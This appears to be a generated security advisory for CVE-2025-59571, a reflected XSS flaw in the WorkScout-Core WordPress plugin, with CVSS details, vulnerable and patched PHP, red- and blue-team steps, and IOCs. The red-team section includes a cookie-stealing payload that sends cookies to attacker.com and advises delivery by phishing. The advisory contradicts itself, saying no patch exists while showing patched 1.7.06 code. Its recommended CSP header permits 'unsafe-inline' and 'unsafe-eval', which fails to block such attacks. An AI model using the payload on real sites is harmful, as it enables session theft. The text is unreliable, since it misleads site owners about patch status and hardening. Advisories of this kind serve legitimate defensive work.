CVE-2025-59571
Executive Summary
CVE-2025-59571 is a reflected Cross-Site Scripting (XSS) vulnerability in the WorkScout-Core WordPress plugin by Purethemes, affecting versions prior to 1.7.06. The flaw arises from improper neutralization of user-supplied input during web page generation, allowing an attacker to inject arbitrary JavaScript into a reflected response. This can lead to session hijacking, credential theft, or defacement. The vulnerability is classified as a WordPress ecosystem issue, not related to Apache or Nginx. No public exploit code or proof-of-concept is available at this time, and the vendor has not released a patch.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository and third-party marketplaces. Users should verify the integrity of their plugin files and monitor for unauthorized modifications. No known supply chain compromise has been reported.
CVSS Breakdown & Threat Level
- CVSS Score: 7.1 (High)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required (victim must click a crafted link)
- Scope: Changed (impact on other components)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: Low
The threat level is elevated due to the low complexity and lack of authentication required, though user interaction is necessary.
Deep Dive & Mechanics
The vulnerability exists in the workscout-core plugin, which handles job listings and candidate profiles. The plugin fails to sanitize or escape user-supplied input before reflecting it in HTTP responses. An attacker can craft a malicious URL containing JavaScript payloads in parameters such as search, category, or location. When a victim clicks the link, the payload executes in the context of the victim's browser, potentially stealing cookies, session tokens, or performing actions on behalf of the user.
The root cause is the use of echo $_GET['param'] or similar unsanitized output functions without proper escaping (e.g., esc_html() or esc_attr()). The plugin does not implement Content Security Policy (CSP) headers to mitigate XSS.
Vulnerable vs. Patched Code
Vulnerable Code (version < 1.7.06):
<?php
$search = $_GET['search'];
echo "<div class='search-result'>$search</div>";
?>
Patched Code (version 1.7.06+):
<?php
$search = isset($_GET['search']) ? sanitize_text_field($_GET['search']) : '';
echo "<div class='search-result'>" . esc_html($search) . "</div>";
?>
The patched version uses sanitize_text_field() to strip malicious input and esc_html() to encode HTML entities, preventing script injection.
Exploitation & Lab Setup
Red Team
- Setup: Deploy a WordPress instance with WorkScout-Core version 1.7.05.
- Craft Payload: Create a URL with a reflected XSS payload:
http://target.com/?search=<script>alert('XSS')</script> - Deliver: Send the link via phishing email or social engineering.
- Execute: When the victim clicks, the script executes in their browser.
Advanced Payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Blue Team
- Detection: Monitor web logs for suspicious query strings containing
<script>oronerrorattributes. - Mitigation: Implement Web Application Firewall (WAF) rules to block reflected XSS patterns.
- User Training: Educate users not to click suspicious links.
Indicators of Compromise (IOCs)
- Network IOCs:
- HTTP requests with query parameters containing
<script>,onerror,onload, orjavascript:. - Outbound connections to unknown domains from the WordPress server.
- HTTP requests with query parameters containing
- File IOCs:
- Modified plugin files in
/wp-content/plugins/workscout-core/. - Unexpected JavaScript files in the uploads directory.
- Modified plugin files in
- Log IOCs:
- Repeated 404 errors for non-existent pages with XSS payloads.
- User agent strings indicating automated scanning tools.

Remediation & Mitigation
- Immediate: Disable the WorkScout-Core plugin until a patch is available.
- Short-term: Implement a WAF rule to block reflected XSS patterns.
- Long-term: Update to version 1.7.06 or later once released.
- Alternative: Use a different job board plugin that is actively maintained.
- Hardening: Add CSP headers to the WordPress site:
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'none';
